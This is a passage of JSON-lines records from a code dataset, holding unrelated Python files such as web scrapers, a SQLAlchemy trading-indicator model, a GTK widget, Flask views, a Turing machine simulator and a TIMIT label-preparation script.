'rating-other-user-rating'})\n rating_ratings = rating_container.find(\"span\").text\n movie_review = divs.find('div', attrs={'class': 'content'})\n review_reviews = movie_review.find(\"div\", attrs = {\"class\": \"text show-more__control\"}).text\n\n review_sentiment = SentimentIntensityAnalyzer().polarity_scores(review_reviews)\n if float(review_sentiment[\"compound\"])>=0.05:\n sentiment = \"Positive\"\n elif float(review_sentiment[\"compound\"])<=-0.05:\n sentiment = \"Negative\"\n else:\n sentiment = \"Neutral\"\n\n review_list.append((review_reviews,rating_ratings, sentiment))\n return review_list\n\n\n\ndef main():\n url = DOWNLOAD_URL\n\n with open('dark_knight_movie_review.csv', 'w', encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n\n fields = ('reviews', 'ratings', 'sentiment')\n writer.writerow(fields)\n\n html = download_page(url)\n movies = parse_html(html)\n writer.writerows(movies)\n\n\nif __name__ == '__main__':\n main()","sub_path":"imdb-scraping-dark-knight.py","file_name":"imdb-scraping-dark-knight.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"219479275","text":"from bs4 import BeautifulSoup\nimport urllib.request\nfrom urllib.error import HTTPError\nimport re\nimport pandas as pd\nimport time\n\n# write HTML to a file in case no Internet available\n# with open(\"meta_page.html\", \"w\", encoding=\"utf-8\") as f:\n# f.write(soup.prettify())\n\nurl = (\n \"http://congbothongtin.ssc.gov.vn/idsPortal/ttcb/bctc/index.ubck?idBcBaoCao=&ttBc=&\"\n)\n# cpage=2: add this param to the url to navigate to the needed pages\n\n\ndef get_last_page(url):\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, \"html.parser\")\n filter_div_tag = soup.find_all(\"div\", class_=\"pager\")\n filter_span_tag = 
filter_div_tag[0].find_all(\"span\", class_=\"pages\")\n last_page = filter_span_tag[0].text.split(\"/\")[-1].strip()\n return last_page\n\n\ndef parse_element_to_table(input, value, step):\n arr = []\n # collect every step-th cell starting at offset value (one entry per table row)\n for i in range(value, len(input), step):\n arr.append(input[i].text.strip())\n return arr\n\n\ndef get_report_id(input, start_point, step):\n report_number = []\n period_number = []\n for i in range(start_point, len(input), step):\n func_name = input[i].a[\"href\"]\n func_value = re.findall(r\"\\(.*?\\)\", func_name)\n splitting = func_value[0].split()\n report_number.append(splitting[0][1:-1])\n period_number.append(splitting[1][0:-1])\n return report_number, period_number\n\n\ndef open_page(url):\n code = True\n i = 0\n while code:\n try:\n page = urllib.request.urlopen(url)\n code = False\n except HTTPError as e:\n i += 1\n print(f\"Attempt: {i}\")\n time.sleep(60)\n if i == 10:\n break\n return page\n\n\ndef crawler(url):\n last_page = get_last_page(url)\n complete_df = []\n # for i in range(int(last_page)):\n for i in range(500):\n page = open_page(url + \"cpage=\" + str(i))\n soup = BeautifulSoup(page, \"html.parser\")\n\n # There are 2 approaches:\n # This paragraph is the first one, which uses the `tr` tag\n # name = soup.find_all('tr', class_='')\n # t = []\n # for i in name:\n # h = i.find_all('td')\n # t.append(h)\n # print(name[8].contents[3].text)\n # print(name[8].contents[5].a['href'])\n\n # Second approach: use `table` tag\n table = soup.find_all(\"table\", class_=\"product-table\")\n data = table[0].find_all(\"td\")\n # id: need to remove \\n \\t\n # company name: no need to do\n # report name: need to remove \\n \\t\n # report_id & period_id: different extraction method\n # quarter name: remove \\n \\t\n # trich yeu: remove \\n \\t\n # time sent: remove \\n \\t\n id = parse_element_to_table(data, 0, 7)\n company_name = parse_element_to_table(data, 1, 7)\n report_name = parse_element_to_table(data, 2, 7)\n quarter_name = parse_element_to_table(data, 3, 7)\n trich_yeu = parse_element_to_table(data, 4, 7)\n time_sent = parse_element_to_table(data, 5, 7)\n report_number, period_number = get_report_id(data, 2, 7)\n dict = {\n \"id\": id,\n \"company_name\": company_name,\n \"report_name\": report_name,\n \"report_number\": report_number,\n \"period_number\": period_number,\n \"quarter_name\": quarter_name,\n \"trich_yeu\": trich_yeu,\n \"time_sent\": time_sent,\n }\n df = pd.DataFrame(dict)\n complete_df.append(df)\n final_df = pd.concat(complete_df)\n return final_df\n\n\nif __name__ == \"__main__\":\n df = crawler(url)\n print(df.info)\n","sub_path":"old_version/crawl_meta_sites.py","file_name":"crawl_meta_sites.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"398382485","text":"from __future__ import division\nfrom builtins import str\nfrom builtins import object\nfrom past.utils import old_div\nfrom collections import defaultdict\nimport time\nfrom datetime import datetime\nimport json\nimport uuid\n\n# decimal import compatible with py2\ntry:\n from decimal import Decimal\nexcept ImportError:\n from cdecimal import Decimal\n\nfrom sqlalchemy import ForeignKey, Column, Integer, Unicode, DateTime, UnicodeText, Numeric, desc, UniqueConstraint\nfrom sqlalchemy.dialects.mysql import DATETIME\n\nfrom lib.models.base import Base #pyx file\nfrom lib import session\nfrom lib.singleton import Singleton\n\nimport pandas as pd\nimport numpy as np\nfrom future.utils import with_metaclass\n\nmetadata = Base.metadata\n\n\nclass 
Datum(Base):\n __tablename__ = 'datum_indicators'\n\n unique_id = Column(Unicode(64), nullable=False)\n datum_id = Column(Integer, primary_key=True)\n time_created = Column(DateTime, nullable=False)\n datum_type = Column(Unicode(64), nullable=False)\n timestamp = Column(Integer, nullable=True)\n exchange = Column(Unicode(64), nullable=False)\n numeric_value = Column(Numeric(precision=20, scale=4))\n string_value = Column(Unicode(256))\n meta_data = Column(UnicodeText(length=2**31))\n\n\n order_id = Column(Integer, ForeignKey('order.order_id'), nullable=True)\n \n __table_args__ = (UniqueConstraint(\"datum_type\", \"timestamp\", \"exchange\", name=\"di_uid\"),)\n\n\n def __init__(self, datum_type, timestamp=None, exchange=None, numeric_value=None, string_value=None, meta_data={}, order=None):\n self.time_created = datetime.utcnow()\n self.datum_type = str(datum_type, \"utf-8\")\n if timestamp is None:\n self.timestamp = datetime.utcnow().strftime(\"%s\")\n else:\n self.timestamp = int(round(timestamp))\n self.exchange = str(exchange, \"utf-8\")\n self.numeric_value = numeric_value\n self.string_value = string_value \n self.unique_id = u'dat_%s' % str(uuid.uuid4().hex)\n self.meta_data = json.dumps(meta_data)\n self.order = order\n\n def __unicode__(self):\n return str(repr(self))\n\n def __repr__(self):\n d = {\n 'datum_type': self.datum_type,\n 'time_created': str(self.time_created),\n 'timestamp' : self.timestamp,\n 'exchange' : self.exchange,\n 'meta_data': json.loads(self.meta_data),\n }\n if self.numeric_value:\n d.update({'numeric_value': str(self.numeric_value)})\n if self.string_value:\n d.update({'string_value': self.string_value})\n\n return json.dumps(d, ensure_ascii=False)\n\n\nclass DatumRecorder(with_metaclass(Singleton, object)):\n def create(self, db=None, logger=None):\n self.db = db\n self.external_logger = logger\n self.data_for_mean = defaultdict(list)\n\n def record(self, datum_type, timestamp, exchange, numeric_value=None, string_value=None, meta_data={}, order=None):\n datum = Datum(\n datum_type,\n timestamp,\n exchange,\n numeric_value=numeric_value,\n string_value=string_value,\n meta_data=meta_data,\n order=order,\n )\n\n if not hasattr(self, 'db') and not hasattr(self, 'external_logger'):\n raise Exception('DatumRecorder must be created before you can record')\n\n if self.db:\n self.db.add(datum)\n session.commit_mysql_session(self.db)\n \n elif self.external_logger:\n self.external_logger.info(datum)\n else:\n # we aren't recording events.\n pass\n\n def record_mean(self, datum_type, timestamp, exchange, numeric_value, sample_size):\n \"\"\"\n Store a datum with the mean of every data points.\n\n This has weird behaviour if two places call it with different sample_sizes.\n We should only have one DatumRecorder line per datum_type\n \"\"\"\n if not hasattr(self, 'data_for_mean'):\n raise Exception('DatumRecorder must be created before you can record')\n\n data = self.data_for_mean[datum_type]\n data.append(numeric_value)\n\n if len(data) >= sample_size:\n mean = old_div(Decimal(sum(data)), Decimal(len(data)))\n self.record(datum_type, timestamp, exchange, numeric_value=mean)\n # Clear the content of a referenced list\n del data[:]\n\n\nclass DatumRetriever(with_metaclass(Singleton, object)):\n def __init__(self, datum_type=None, exchange=None, timestamp=None):\n self.datum_type = datum_type\n self.exchange = exchange\n self.timestamp = timestamp\n\n def get(self):\n '''try to filter automatically by args that are not none'''\n db = 
session.get_a_trading_db_mysql_session()\n data = db.query(Datum).filter_by(\n datum_type=self.datum_type,\n exchange=self.exchange).order_by(\n desc(Datum.timestamp)).all()\n\n return data\n \n def get_pandas(self):\n raw_series = self.get()\n pd_series = self.convert_series_to_pandas(raw_series)\n\n return pd_series\n\n def convert_series_to_pandas(self, series):\n series = sorted(series, key=lambda m: m.timestamp)\n\n index = [m.timestamp for m in series]\n values = [float(m.numeric_value) if m.numeric_value is not None else np.nan for m in series]\n\n return pd.Series(values, index=index)\n\n","sub_path":"app/lib/models/clickhouse/datum_indicators.py","file_name":"datum_indicators.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"272156951","text":"# Copyright (c) 2016, Zsombor Hollay-Horváth\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\n\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, cairo, PangoCairo\nimport cairo\n\n\nimport math\n\n\nfrom enum import Enum\n\n\nfrom ui.Container import Container\n\n\n\nclass Bin(Container):\n\n class CornerStyle(Enum):\n SHARP = 0\n ROUND_SMALL = 1\n ROUND_BIG = 2\n\n\n class Style:\n def __init__(self, style = {}):\n self.background = (1, 1, 1)\n self.bordercolor = (0, 0, 0)\n self.borderwidth = 1\n self.corners = (Bin.CornerStyle.SHARP,\n Bin.CornerStyle.SHARP,\n Bin.CornerStyle.SHARP,\n Bin.CornerStyle.SHARP)\n\n self.set_style(style)\n\n\n def set_style(self, style = {}):\n for key, val in style.items():\n self.__setattr__(key, val)\n\n self.update_corners()\n\n\n def set_background(self, background):\n self.background = background\n\n\n def get_background(self):\n return self.background\n\n\n def set_bordercolor(self, bordercolor):\n self.bordercolor = bordercolor\n\n\n def get_bordercolor(self):\n return self.bordercolor\n\n\n def set_borderwidth(self, borderwidth):\n self.borderwidth = borderwidth\n\n\n def get_borderwidth(self):\n return self.borderwidth\n\n\n def set_corners(self, corners):\n self.corners = corners\n self.update_corners()\n\n\n def get_corners(self):\n return self.corners\n\n\n def update_corners(self):\n if (isinstance(self.corners, 
Bin.CornerStyle)):\n self.corners = (self.corners,\n self.corners,\n self.corners,\n self.corners)\n elif (len(self.corners) == 2):\n self.corners = (self.corners[0],\n self.corners[0],\n self.corners[1],\n self.corners[1])\n\n\n def __init__(self, size = (20, 20), position = (0, 0)):\n Container.__init__(self)\n self.show = True\n\n self.size = (size[0]-1, size[1]-1)\n self.position = position\n self.update_delta()\n\n self.style = Bin.Style()\n\n\n def set_show(self, show):\n self.show = show\n\n\n def get_show(self):\n return self.show\n\n\n def toggle_show(self):\n self.show = not self.show\n\n\n def set_size(self, x, y):\n self.size = (x-1, y-1)\n self.update_delta()\n\n\n def get_size(self):\n return self.size\n\n\n def set_position(self, w, h):\n self.position = (w, h)\n self.update_delta()\n\n\n def get_position(self):\n return self.position\n\n\n def update_delta(self):\n self.delta = (self.position[0]+self.size[0], self.position[1]+self.size[1])\n\n\n def set_style(self, style):\n self.style.set_style(style)\n\n\n def get_style(self):\n return self.style\n\n\n def draw(self, cr):\n if (not self.show):\n return\n\n corners = self.style.get_corners()\n\n cr.new_sub_path()\n if (corners[0] == Bin.CornerStyle.SHARP):\n cr.arc(self.position[0], self.position[1], 0, -math.pi, -math.pi/2)\n elif (corners[0] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.position[0]+4, self.position[1]+4, 4, -math.pi, -math.pi/2)\n else:\n cr.arc(self.position[0]+9, self.position[1]+9, 9, -math.pi, -math.pi/2)\n\n if (corners[1] == Bin.CornerStyle.SHARP):\n cr.arc(self.delta[0], self.position[1], 0, -math.pi/2, 0)\n elif (corners[1] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.delta[0]-4, self.position[1]+4, 4, -math.pi/2, 0)\n else:\n cr.arc(self.delta[0]-9, self.position[1]+9, 9, -math.pi/2, 0)\n\n if (corners[2] == Bin.CornerStyle.SHARP):\n cr.arc(self.delta[0], self.delta[1], 0, 0, math.pi/2)\n elif (corners[2] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.delta[0]-4, self.delta[1]-4, 4, 0, math.pi/2)\n else:\n cr.arc(self.delta[0]-9, self.delta[1]-9, 9, 0, math.pi/2)\n\n if (corners[3] == Bin.CornerStyle.SHARP):\n cr.arc(self.position[0], self.delta[1], 0, math.pi/2, math.pi)\n elif (corners[3] == Bin.CornerStyle.ROUND_SMALL):\n cr.arc(self.position[0]+4, self.delta[1]-4, 4, math.pi/2, math.pi)\n else:\n cr.arc(self.position[0]+9, self.delta[1]-9, 9, math.pi/2, math.pi)\n cr.close_path()\n\n cr.set_source_rgba(*self.style.get_background())\n cr.fill_preserve()\n\n cr.set_source_rgba(*self.style.get_bordercolor())\n cr.set_line_width(self.style.get_borderwidth())\n cr.stroke()\n","sub_path":"ui/Bin.py","file_name":"Bin.py","file_ext":"py","file_size_in_byte":6190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"602961054","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 31 22:12:05 2015\n\n@author: cory\n\"\"\"\n\nfrom nltk.corpus import wordnet as wn\n\nwith open(\"./Data/cleaned_nouns.txt\", \"r\") as cleaned:\n with open(\"./Data/tagged_and_nouned.txt\", \"w\") as tagnoun:\n entries = []\n for noun in cleaned.readlines():\n noun = str(noun)[:-1]\n tag = wn.synsets(noun)\n if tag:\n tag = str(tag)\n if noun.lower() + \".n.\" in tag and \"_\" not in tag:\n entries.append(noun.lower())\n else:\n entries.append(noun.lower())\n entries = list(set(entries)) \n for entry in sorted(entries):\n tagnoun.write(entry + 
\"\\n\")","sub_path":"tag_pos.py","file_name":"tag_pos.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"639757054","text":"import warnings\nfrom abc import ABC\nfrom typing import Any, ClassVar\n\nfrom pydantic import BaseModel\nfrom pydantic.validators import dict_validator\n\nfrom gmso.abc.auto_doc import apply_docs\n\n\nclass GMSOBase(BaseModel, ABC):\n \"\"\"A BaseClass to all abstract classes in GMSO\"\"\"\n __base_doc__: ClassVar[str] = \"\"\"A base class to all abstract base classes in gmso.\"\"\"\n\n __docs_generated__: ClassVar[bool] = False\n\n def __hash__(self):\n return id(self)\n\n def __eq__(self, other):\n return self is other\n\n def __setattr__(self, name: Any, value: Any) -> None:\n if name in self.__config__.alias_to_fields:\n name = self.__config__.alias_to_fields[name]\n else:\n warnings.warn(\n 'Use of internal fields is discouraged. '\n 'Please use external fields to set attributes.'\n )\n\n super().__setattr__(name, value)\n\n @classmethod\n def __init_subclass__(cls, **kwargs):\n super().__init_subclass__()\n setattr(cls, '__docs_generated__', False)\n for super_class in cls.mro()[1:]:\n if hasattr(super_class, 'Config') and \\\n hasattr(super_class.Config, 'alias_to_fields') and \\\n hasattr(cls.Config, 'alias_to_fields'):\n cls.Config.alias_to_fields.update(super_class.Config.alias_to_fields)\n apply_docs(cls, map_names=True, silent=False)\n\n @classmethod\n def validate(cls, value):\n if isinstance(value, cls):\n return value\n else:\n return cls(**dict_validator(value))\n\n @classmethod\n def __get_validators__(cls) -> 'CallableGenerator':\n yield cls.validate\n\n class Config:\n arbitrary_types_allowed = True\n alias_to_fields = dict()\n extra = 'forbid'\n","sub_path":"gmso/abc/gmso_base.py","file_name":"gmso_base.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"173553240","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8\n# Author: Shinya Suzuki\n# Created: 2017-11-16\n\nfrom flask import render_template, request\nfrom application import app, db\nfrom application.models import Profile\nfrom application.models import Message\n\n\n@app.route('/')\ndef route_index():\n return render_template('index.html')\n\n\n@app.route('/profile')\ndef route_profile():\n id = request.args.get('id', type=int)\n if id is not None:\n profiles = Profile.query.get(id)\n if profiles is not None:\n return render_template('profile.html', profile=profiles)\n else:\n return render_template('profile.html')\n else:\n return render_template('profile.html')\n\n\n@app.route('/bbs', methods=['GET', 'POST'])\ndef route_bbs():\n if request.method == 'POST':\n m = request.form['message']\n message = Message(\n message=m\n )\n db.session.add(message)\n db.session.commit()\n messages = Message.query.with_entities(Message.message)\n return render_template('bbs.html', messages=messages)\n","sub_path":"application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"533682790","text":"#! 
/usr/bin/env python\n\nimport rospy\nfrom std_srvs.srv import Empty, EmptyResponse\nfrom move_bb8 import MoveBB8\n\ndef my_callback(request):\n rospy.loginfo(\"The service MoveBB8 is called\")\n movebb8_object= MoveBB8()\n movebb8_object.move_square()\n rospy.loginfo(\"Finished service call\")\n return EmptyResponse() \n\n\nrospy.init_node('service_move_bb8_in_square_server') \nmy_service = rospy.Service('/move_bb8_in_square', Empty , my_callback) # create the Service called my_service with the defined callback\nrospy.loginfo(\"service /move_bb8_in_square is ready\")\nrospy.spin() # maintain the service open.","sub_path":"ROS_Basics/unit_3_2_services/src/bb8_move_in_square_server.py","file_name":"bb8_move_in_square_server.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"263573200","text":"import math\n\n\"\"\"\n\nЛитовченко Даниил, ИВТ group 2, subgroup 3\n\nVariant 6:\nThe surface area of a cube equals s. Find its diagonal.\nWrite the solution as a function diagonal(s) that returns d.\nFor example, with s=18 the function diagonal(18) returns the value of the variable d,\nwhich equals 3\n\n\"\"\"\n\ndef diagonal(s):\n a = math.sqrt(s/6)\n d = math.sqrt(3*a*a)\n return d\n\ns=float(input(\"Enter the surface area: \"))\nprint(\"Diagonal: \",diagonal(s))\n","sub_path":"3 семестр/Тема 2/samrab8(2.4).py","file_name":"samrab8(2.4).py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"64954113","text":"''' \r\n PRACTICAL ASSIGNMENT\r\n GCC108 - Theory of Computation\r\n Name: Juliano Expedito de Andrade Godinho\r\n Class: 14A\r\n Student ID: 201811302\r\n \r\n'''\r\n\r\n# Function to check whether the tape is valid!\r\ndef checarFita(fita, alfabeto):\r\n \r\n for f in fita:\r\n # If a symbol does not belong to the alphabet, return False and that symbol\r\n if f not in alfabeto:\r\n return False, f\r\n \r\n # If the tape is valid, return True and an empty string\r\n return True, ''\r\n\r\n\r\n# Use sys to open the file\r\nimport sys\r\n\r\n# A list of the states\r\n# Each position represents a state holding a dictionary with its transitions\r\n# [{}, {}, {}]\r\nestados = []\r\n\r\n# Input alphabet\r\nalfabeto_entrada = []\r\n\r\n# Tape alphabet\r\nalfabeto_fita = []\r\n \r\n# Open the file\r\nf = open(sys.argv[1])\r\n\r\n# Read the beginning\r\nf.read(3)\r\n\r\n# Read the states\r\nwhile f.read(1) != ',':\r\n \r\n # Read each state and a comma\r\n f3 = f.read(3)\r\n \r\n # Append an empty dictionary to the state list\r\n estados.append({})\r\n \r\n \r\n# Read past the states\r\nf.read(2)\r\n\r\n\r\n# Read the input alphabet\r\nwhile f.read(1) != ',':\r\n \r\n f2 = f.read(2)\r\n \r\n alfabeto_entrada.append(f2[0])\r\n \r\n \r\n# Read past the input alphabet\r\nf.read(2)\r\n\r\n\r\n# Read the tape alphabet\r\nwhile f.read(1) != '}':\r\n \r\n # Read one symbol of the alphabet\r\n f1 = f.read(1)\r\n \r\n # Add it to the alphabet\r\n alfabeto_fita.append(f1)\r\n \r\n # Create a key for this alphabet symbol in every state of the state list\r\n for estado in estados:\r\n estado[f1] = {}\r\n\r\n\r\n# Read past the tape alphabet\r\nf.read(4)\r\n\r\n\r\n# Write the transitions into each state's dictionary\r\nwhile f.read(3)[1] != '}':\r\n \r\n # Read the transition line\r\n # Example (22 characters): (q0, B) -> (q1, B, R),\r\n 
transicao = f.read(22)\r\n \r\n # Pegando o estado da lista estados\r\n estado = estados[eval(transicao[2])]\r\n \r\n '''\r\n Exemplo do formato:\r\n Estado q0 -> portanto pega-se a posicao 0 da lista de estados\r\n No dicionario desta posicao, entao se adiciona uma chave que corresponde a leitura\r\n E seu valor e uma tupla que corresponde (qj, y, D)\r\n Sendo qj o destino da transicao\r\n y a escrita\r\n e D a direcao\r\n Exemplo:\r\n (q0, B) -> (q1, B, R),\r\n Posicao 0 na lista estados\r\n {'B' : (q1, B, R)}\r\n Portanto, o estado q0 ao ler B, ira para q1, escrevera B na fita e ira para direita\r\n '''\r\n estado[transicao[5]]= (transicao[13], transicao[16], transicao[19])\r\n \r\n \r\n# Guardando o estado inicial\r\nestado_inicial = f.read(8)[3]\r\n\r\n# Lendo a fita (Restante do arquivo)\r\nfita = f.readlines()[0]\r\n\r\n# Fechando o arquivo\r\nf.close()\r\n\r\n# Criando o estado atual\r\nestado_atual = estado_inicial\r\n\r\n# Posicao da fita\r\npos = 0\r\n\r\n# Realizando a checagem da fita\r\nchecagem = checarFita(fita, alfabeto_fita)\r\n\r\n# Caso a checagem esteja correta (True), entra no while para percorrer a fita\r\nif checagem[0]:\r\n \r\n # Criando o arquivo para saida - Cria-se apenas se nao houver erro na fita\r\n f = open(sys.argv[2], 'w')\r\n \r\n # Loop\r\n while True:\r\n \r\n # Escrevendo a fita no arquivo\r\n f.write(fita[:pos] + '{{q{}}}'.format(estado_atual) + fita[pos:] + '\\n')\r\n \r\n # Recebendo o estado\r\n estado = estados[eval(estado_atual)]\r\n \r\n # Leitura da posicao atual da fita\r\n leitura = fita[pos]\r\n \r\n # Tupla -> (Destino, Escrita, Movimento)\r\n tupla = estado[leitura]\r\n \r\n # Condicao de Parada\r\n # Caso o estado atual nao consiga transitar com a posicao atual da fita, programa para!\r\n if tupla == {}:\r\n break\r\n \r\n # Organizando e escrevendo na fita\r\n fita = fita[:pos] + tupla[1] + fita[pos+1:]\r\n \r\n # Movimentando\r\n if tupla[2] == 'R':\r\n pos += 1\r\n else: pos -= 1\r\n \r\n # Alterando o estado atual\r\n estado_atual = tupla[0]\r\n \r\n# Caso a fita esteja incorreta, emite uma mensagem, indicando o erro na fita\r\nelse:\r\n print('Fita incorreta - Arquivo nao foi criado! {} nao pertence ao alfabeto da fita!'.format(checagem[1]))\r\n ","sub_path":"Máquina de Turing/maquina.py","file_name":"maquina.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"18526620","text":"#! 
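The maquina.py record above decodes each transition line by fixed character offsets (e.g. `transicao[2]`, `transicao[5]`). For contrast, a hedged sketch of the same machine step driven by a lookup table; this is not the author's parser, and the transitions are invented for illustration:

```python
# Hedged sketch (not the author's parser): a Turing-machine step expressed as
# a {(state, symbol): (next_state, write, move)} table; transitions invented.
transitions = {('0', 'B'): ('1', 'X', 'R'),
               ('1', 'B'): ('0', 'B', 'R')}

def step(state, tape, pos):
    key = (state, tape[pos])
    if key not in transitions:
        return None  # no transition defined for this pair: halt
    nxt, write, move = transitions[key]
    tape[pos] = write
    return nxt, pos + (1 if move == 'R' else -1)

state, tape, pos = '0', list('BBBB'), 0
while 0 <= pos < len(tape):
    result = step(state, tape, pos)
    if result is None:
        break
    state, pos = result
print(''.join(tape))  # -> 'XBXB'
```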
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Make character-level target labels for the End-to-End model (TIMIT corpus).\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom os.path import join, basename\nimport re\nimport numpy as np\nfrom tqdm import tqdm\nimport pickle\n\nfrom utils.labels.character import char2index\n\n# NOTE:\n############################################################\n# CTC model\n\n# - character\n# 26 alphabets(a-z),\n# space(_), apostorophe('),\n# = 26 + 2 = 28 labels\n\n# - character_capital_divide\n# 26 lower alphabets(a-z), 26 upper alphabets(A-Z),\n# 19 special double-letters, apostorophe(')\n# = 26 * 2 + 19 + 1 = 72 labels\n############################################################\n\n############################################################\n# Attention-based model\n\n# - character\n# 26 alphabets(a-z), , \n# space(_), apostorophe(')\n# = 26 + 2 + 2 = 30 labels\n\n# - character_capital_divide\n# 26 lower alphabets(a-z), 26 upper alphabets(A-Z) , \n# 19 special double-letters, apostorophe(')\n# = 26 * 2 + 2 + 19 + 1 = 74 labels\n############################################################\n\n\ndef read_text(label_paths, run_root_path, model, save_map_file=False,\n save_path=None, divide_by_capital=False, stdout_transcript=False):\n \"\"\"Read text transcript.\n Args:\n label_paths (list): list of paths to label files\n run_root_path (string): absolute path of make.sh\n model (string): ctc or attention\n save_map_file (string): if True, save the mapping file\n save_path (string, optional): path to save labels. If None, don't save labels\n divide_by_capital (bool, optional): if True, each word will be diveded\n by capital letters rather than spaces. In addition, repeated letters\n will be grouped by a special double-letter unit.\n ex.) 
hello => h e ll o\n This implementation is based on\n https://arxiv.org/abs/1609.05935.\n Zweig, Geoffrey, et al.\n \"Advances in all-neural speech recognition.\"\n in Proceedings of ICASSP, 2017.\n stdout_transcript (bool, optional): if True, print transcripts to standard output\n \"\"\"\n if model not in ['ctc', 'attention']:\n raise TypeError('model must be ctc or attention.')\n\n print('===> Reading target labels...')\n text_dict = {}\n char_set = set([])\n for label_path in tqdm(label_paths):\n with open(label_path, 'r') as f:\n line = f.readlines()[-1]\n\n # Remove 「\"」, 「:」, 「;」, 「!」, 「?」, 「,」, 「.」, 「-」\n # Convert to lowercase\n line = re.sub(r'[\\\":;!?,.-]+', '', line.strip().lower())\n\n if divide_by_capital:\n transcript = ''\n for word in line.split(' ')[2:]:\n if len(word) == 0:\n continue\n\n # Replace space with a capital letter\n word = word[0].upper() + word[1:]\n\n # Check double-letters\n for i in range(0, len(word) - 1, 1):\n if word[i] == word[i + 1]:\n char_set.add(word[i] * 2)\n\n transcript += word\n\n else:\n # Convert space to \"_\"\n transcript = '_'.join(line.split(' ')[2:])\n\n if model == 'attention':\n transcript = '<' + transcript + '>'\n\n for c in list(transcript):\n char_set.add(c)\n\n text_dict[label_path] = transcript\n\n # for debug\n if stdout_transcript:\n # print(transcript)\n speaker = label_path.split('/')[-2]\n utt_index = basename(label_path).split('.')[0]\n print(speaker + '_' + utt_index)\n\n # Make mapping file (from character to number)\n if divide_by_capital:\n mapping_file_path = join(\n run_root_path, 'labels', 'mapping_files', model, 'character_capital.txt')\n else:\n mapping_file_path = join(\n run_root_path, 'labels', 'mapping_files', model, 'character.txt')\n char_set.discard('_')\n char_set.discard('\\'')\n if model == 'attention':\n char_set.discard('<')\n char_set.discard('>')\n\n if save_map_file:\n with open(mapping_file_path, 'w') as f:\n if model == 'attention':\n char_list = ['<', '>']\n elif model == 'ctc':\n char_list = []\n\n if divide_by_capital:\n char_list += sorted(list(char_set)) + ['\\'']\n else:\n char_list += ['_'] + sorted(list(char_set)) + ['\\'']\n\n for i, char in enumerate(char_list):\n f.write('%s %s\\n' % (char, str(i)))\n\n if save_path is not None:\n label_num_dict = {}\n # Save target labels\n print('===> Saving target labels...')\n for label_path, transcript in tqdm(text_dict.items()):\n speaker = label_path.split('/')[-2]\n utt_index = basename(label_path).split('.')[0]\n\n # Convert from character to index\n index_list = char2index(transcript, mapping_file_path,\n double_letter=divide_by_capital)\n\n # Save as npy file\n np.save(join(save_path, speaker + '_' + utt_index + '.npy'), index_list)\n\n # Count label number\n label_num_dict[speaker + '_' + utt_index] = len(index_list)\n\n # Save the label number dictionary\n print('===> Saving : label_num.pickle')\n with open(join(save_path, 'label_num.pickle'), 'wb') as f:\n pickle.dump(label_num_dict, f)\n","sub_path":"timit/labels/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":5783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"196228081","text":"#!/usr/bin/python3\nimport sys\nimport requests\nimport sqlite3\n\n# sql statement for the creation of the users table\nsqlUsersTable = 'CREATE TABLE IF NOT EXISTS user (id integer PRIMARY KEY, username 